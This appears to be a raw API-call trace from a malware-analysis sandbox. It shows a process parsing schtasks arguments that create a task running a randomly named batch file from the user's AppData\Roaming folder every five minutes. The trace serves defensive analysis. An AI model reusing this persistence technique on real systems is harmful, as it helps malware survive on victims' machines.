_vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|d|") returned 3 [0172.542] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.542] lstrlenW (lpString="|d|") returned 3 [0172.542] lstrlenW (lpString="|tr|") returned 4 [0172.542] SetLastError (dwErrCode=0x490) [0172.542] lstrlenW (lpString="m") returned 1 [0172.542] lstrlenW (lpString="m") returned 1 [0172.542] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.542] lstrlenW (lpString="tr") returned 2 [0172.543] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.543] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|m|") returned 3 [0172.543] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.543] lstrlenW (lpString="|m|") returned 3 [0172.543] lstrlenW (lpString="|tr|") returned 4 [0172.543] SetLastError (dwErrCode=0x490) [0172.543] lstrlenW (lpString="i") returned 1 [0172.543] lstrlenW (lpString="i") returned 1 [0172.543] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.543] lstrlenW (lpString="tr") returned 2 [0172.543] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.543] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|i|") returned 3 [0172.543] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.543] lstrlenW (lpString="|i|") returned 3 [0172.543] lstrlenW (lpString="|tr|") returned 4 [0172.543] SetLastError (dwErrCode=0x490) [0172.543] lstrlenW (lpString="tn") returned 2 [0172.543] lstrlenW (lpString="tn") returned 2 [0172.543] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.543] lstrlenW (lpString="tr") returned 2 [0172.543] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.543] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.543] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.543] lstrlenW (lpString="|tn|") returned 4 [0172.543] lstrlenW (lpString="|tr|") returned 4 [0172.543] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0172.543] SetLastError (dwErrCode=0x490) [0172.543] lstrlenW (lpString="tr") returned 2 [0172.544] lstrlenW (lpString="tr") returned 2 [0172.544] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.544] lstrlenW (lpString="tr") returned 2 [0172.544] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.544] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.544] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.544] lstrlenW (lpString="|tr|") returned 4 [0172.544] lstrlenW (lpString="|tr|") returned 4 [0172.544] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0172.544] SetLastError (dwErrCode=0x0) [0172.544] SetLastError (dwErrCode=0x0) [0172.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0172.544] lstrlenW (lpString="-/") returned 2 [0172.544] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0172.544] SetLastError (dwErrCode=0x490) [0172.544] SetLastError (dwErrCode=0x490) [0172.544] SetLastError (dwErrCode=0x0) [0172.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0172.544] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat" [0172.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0172.544] _memicmp (_Buf1=0x9d4e10, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.544] _memicmp (_Buf1=0x9d4e40, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.544] SetLastError (dwErrCode=0x7a) [0172.544] SetLastError (dwErrCode=0x0) [0172.544] SetLastError (dwErrCode=0x0) [0172.544] lstrlenW (lpString="C") returned 1 [0172.544] SetLastError (dwErrCode=0x490) [0172.544] SetLastError (dwErrCode=0x0) [0172.544] GetProcessHeap () returned 0x9c0000 [0172.544] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4e70 [0172.545] _memicmp (_Buf1=0x9d4e70, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0172.545] GetProcessHeap () returned 0x9c0000 [0172.545] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x76) returned 0x9cf830 [0172.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0172.545] lstrlenW (lpString=" \x09") returned 2 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x6a) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0172.545] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0172.545] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x58) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x6a) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x34) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0172.546] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0172.547] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0172.547] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0172.547] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0172.547] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0172.547] GetLastError () returned 0x0 [0172.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0172.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0172.547] SetLastError (dwErrCode=0x0) [0172.547] SetLastError (dwErrCode=0x0) [0172.547] lstrlenW (lpString="/sc") returned 3 [0172.547] lstrlenW (lpString="-/") returned 2 [0172.547] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.547] lstrlenW (lpString="create") returned 6 [0172.547] lstrlenW (lpString="create") returned 6 [0172.547] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.547] lstrlenW (lpString="sc") returned 2 [0172.547] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.547] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|create|") returned 8 [0172.547] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.547] lstrlenW (lpString="|create|") returned 8 [0172.547] lstrlenW (lpString="|sc|") returned 4 [0172.547] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0172.547] SetLastError (dwErrCode=0x490) [0172.547] lstrlenW (lpString="?") returned 1 [0172.547] lstrlenW (lpString="?") returned 1 [0172.547] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.547] lstrlenW (lpString="sc") returned 2 [0172.547] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.547] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|?|") returned 3 [0172.547] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.548] lstrlenW (lpString="|?|") returned 3 [0172.548] lstrlenW (lpString="|sc|") returned 4 [0172.548] SetLastError (dwErrCode=0x490) [0172.548] lstrlenW (lpString="s") returned 1 [0172.548] lstrlenW (lpString="s") returned 1 [0172.548] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.548] lstrlenW (lpString="sc") returned 2 [0172.548] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.548] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|s|") returned 3 [0172.548] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.548] lstrlenW (lpString="|s|") returned 3 [0172.548] lstrlenW (lpString="|sc|") returned 4 [0172.548] SetLastError (dwErrCode=0x490) [0172.548] lstrlenW (lpString="u") returned 1 [0172.548] lstrlenW (lpString="u") returned 1 [0172.548] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.548] lstrlenW (lpString="sc") returned 2 [0172.548] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.548] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|u|") returned 3 [0172.548] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.548] lstrlenW (lpString="|u|") returned 3 [0172.548] lstrlenW (lpString="|sc|") returned 4 [0172.548] SetLastError (dwErrCode=0x490) [0172.548] lstrlenW (lpString="p") returned 1 [0172.548] lstrlenW (lpString="p") returned 1 [0172.548] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.549] lstrlenW (lpString="sc") returned 2 [0172.549] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.549] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|p|") returned 3 [0172.549] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.549] lstrlenW (lpString="|p|") returned 3 [0172.549] lstrlenW (lpString="|sc|") returned 4 [0172.549] SetLastError (dwErrCode=0x490) [0172.549] lstrlenW (lpString="ru") returned 2 [0172.549] lstrlenW (lpString="ru") returned 2 [0172.549] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.549] lstrlenW (lpString="sc") returned 2 [0172.549] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.549] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ru|") returned 4 [0172.549] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.549] lstrlenW (lpString="|ru|") returned 4 [0172.549] lstrlenW (lpString="|sc|") returned 4 [0172.549] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0172.549] SetLastError (dwErrCode=0x490) [0172.549] lstrlenW (lpString="rp") returned 2 [0172.549] lstrlenW (lpString="rp") returned 2 [0172.549] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.549] lstrlenW (lpString="sc") returned 2 [0172.549] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.550] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|rp|") returned 4 [0172.550] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.550] lstrlenW (lpString="|rp|") returned 4 [0172.550] lstrlenW (lpString="|sc|") returned 4 [0172.550] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0172.550] SetLastError (dwErrCode=0x490) [0172.550] lstrlenW (lpString="sc") returned 2 [0172.550] lstrlenW (lpString="sc") returned 2 [0172.550] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.550] lstrlenW (lpString="sc") returned 2 [0172.550] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.550] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.550] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.550] lstrlenW (lpString="|sc|") returned 4 [0172.550] lstrlenW (lpString="|sc|") returned 4 [0172.550] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0172.550] SetLastError (dwErrCode=0x0) [0172.550] SetLastError (dwErrCode=0x0) [0172.550] lstrlenW (lpString="minute") returned 6 [0172.550] lstrlenW (lpString="-/") returned 2 [0172.550] StrChrIW (lpStart="-/", wMatch=0x6d) returned 0x0 [0172.550] SetLastError (dwErrCode=0x490) [0172.550] SetLastError (dwErrCode=0x490) [0172.550] SetLastError (dwErrCode=0x0) [0172.550] lstrlenW (lpString="minute") returned 6 [0172.550] StrChrIW (lpStart="minute", wMatch=0x3a) returned 0x0 [0172.550] SetLastError (dwErrCode=0x490) [0172.550] SetLastError (dwErrCode=0x0) [0172.550] _memicmp (_Buf1=0x9d4e70, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.550] lstrlenW (lpString="minute") returned 6 [0172.550] lstrlenW (lpString="minute") returned 6 [0172.550] lstrlenW (lpString=" \x09") returned 2 [0172.550] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0172.551] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0172.551] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0172.551] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0172.551] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0172.551] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0172.551] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0172.551] GetLastError () returned 0x0 [0172.551] lstrlenW (lpString="minute") returned 6 [0172.551] lstrlenW (lpString="minute") returned 6 [0172.551] SetLastError (dwErrCode=0x0) [0172.551] SetLastError (dwErrCode=0x0) [0172.551] lstrlenW (lpString="/mo") returned 3 [0172.551] lstrlenW (lpString="-/") returned 2 [0172.551] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.551] lstrlenW (lpString="create") returned 6 [0172.551] lstrlenW (lpString="create") returned 6 [0172.551] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.551] lstrlenW (lpString="mo") returned 2 [0172.551] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.551] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|create|") returned 8 [0172.551] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.551] lstrlenW (lpString="|create|") returned 8 [0172.551] lstrlenW (lpString="|mo|") returned 4 [0172.551] StrStrIW (lpFirst="|create|", lpSrch="|mo|") returned 0x0 [0172.551] SetLastError (dwErrCode=0x490) [0172.551] lstrlenW (lpString="?") returned 1 [0172.551] lstrlenW (lpString="?") returned 1 [0172.551] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.551] lstrlenW (lpString="mo") returned 2 [0172.552] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.552] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|?|") returned 3 [0172.552] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.552] lstrlenW (lpString="|?|") returned 3 [0172.552] lstrlenW (lpString="|mo|") returned 4 [0172.552] SetLastError (dwErrCode=0x490) [0172.552] lstrlenW (lpString="s") returned 1 [0172.552] lstrlenW (lpString="s") returned 1 [0172.552] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.552] lstrlenW (lpString="mo") returned 2 [0172.552] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.552] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|s|") returned 3 [0172.552] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.552] lstrlenW (lpString="|s|") returned 3 [0172.552] lstrlenW (lpString="|mo|") returned 4 [0172.552] SetLastError (dwErrCode=0x490) [0172.552] lstrlenW (lpString="u") returned 1 [0172.552] lstrlenW (lpString="u") returned 1 [0172.552] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.552] lstrlenW (lpString="mo") returned 2 [0172.552] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.552] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|u|") returned 3 [0172.552] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.553] lstrlenW (lpString="|u|") returned 3 [0172.553] lstrlenW (lpString="|mo|") returned 4 [0172.553] SetLastError (dwErrCode=0x490) [0172.553] lstrlenW (lpString="p") returned 1 [0172.553] lstrlenW (lpString="p") returned 1 [0172.553] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.553] lstrlenW (lpString="mo") returned 2 [0172.553] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.553] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|p|") returned 3 [0172.553] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.553] lstrlenW (lpString="|p|") returned 3 [0172.553] lstrlenW (lpString="|mo|") returned 4 [0172.553] SetLastError (dwErrCode=0x490) [0172.553] lstrlenW (lpString="ru") returned 2 [0172.553] lstrlenW (lpString="ru") returned 2 [0172.553] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.553] lstrlenW (lpString="mo") returned 2 [0172.553] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.553] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ru|") returned 4 [0172.553] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.553] lstrlenW (lpString="|ru|") returned 4 [0172.554] lstrlenW (lpString="|mo|") returned 4 [0172.554] StrStrIW (lpFirst="|ru|", lpSrch="|mo|") returned 0x0 [0172.554] SetLastError (dwErrCode=0x490) [0172.554] lstrlenW (lpString="rp") returned 2 [0172.554] lstrlenW (lpString="rp") returned 2 [0172.554] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.554] lstrlenW (lpString="mo") returned 2 [0172.554] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.554] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|rp|") returned 4 [0172.554] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.554] lstrlenW (lpString="|rp|") returned 4 [0172.554] lstrlenW (lpString="|mo|") returned 4 [0172.554] StrStrIW (lpFirst="|rp|", lpSrch="|mo|") returned 0x0 [0172.554] SetLastError (dwErrCode=0x490) [0172.554] lstrlenW (lpString="sc") returned 2 [0172.554] lstrlenW (lpString="sc") returned 2 [0172.554] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.554] lstrlenW (lpString="mo") returned 2 [0172.554] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.554] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.554] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.555] lstrlenW (lpString="|sc|") returned 4 [0172.555] lstrlenW (lpString="|mo|") returned 4 [0172.555] StrStrIW (lpFirst="|sc|", lpSrch="|mo|") returned 0x0 [0172.555] SetLastError (dwErrCode=0x490) [0172.555] lstrlenW (lpString="mo") returned 2 [0172.555] lstrlenW (lpString="mo") returned 2 [0172.555] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.555] lstrlenW (lpString="mo") returned 2 [0172.555] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.555] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.555] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.555] lstrlenW (lpString="|mo|") returned 4 [0172.555] lstrlenW (lpString="|mo|") returned 4 [0172.555] StrStrIW (lpFirst="|mo|", lpSrch="|mo|") returned="|mo|" [0172.555] SetLastError (dwErrCode=0x0) [0172.555] SetLastError (dwErrCode=0x0) [0172.555] lstrlenW (lpString="5") returned 1 [0172.555] SetLastError (dwErrCode=0x490) [0172.555] SetLastError (dwErrCode=0x0) [0172.555] lstrlenW (lpString="5") returned 1 [0172.555] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0 [0172.555] SetLastError (dwErrCode=0x490) [0172.555] SetLastError (dwErrCode=0x0) [0172.555] _memicmp (_Buf1=0x9d4e70, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.556] lstrlenW (lpString="5") returned 1 [0172.556] lstrlenW (lpString="5") returned 1 [0172.556] lstrlenW (lpString=" \x09") returned 2 [0172.556] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0172.556] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0172.556] GetLastError () returned 0x0 [0172.556] lstrlenW (lpString="5") returned 1 [0172.556] lstrlenW (lpString="5") returned 1 [0172.556] GetProcessHeap () returned 0x9c0000 [0172.556] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x4) returned 0x9d6a50 [0172.556] SetLastError (dwErrCode=0x0) [0172.556] SetLastError (dwErrCode=0x0) [0172.556] lstrlenW (lpString="/RL") returned 3 [0172.556] lstrlenW (lpString="-/") returned 2 [0172.556] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.556] lstrlenW (lpString="create") returned 6 [0172.556] lstrlenW (lpString="create") returned 6 [0172.556] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.556] 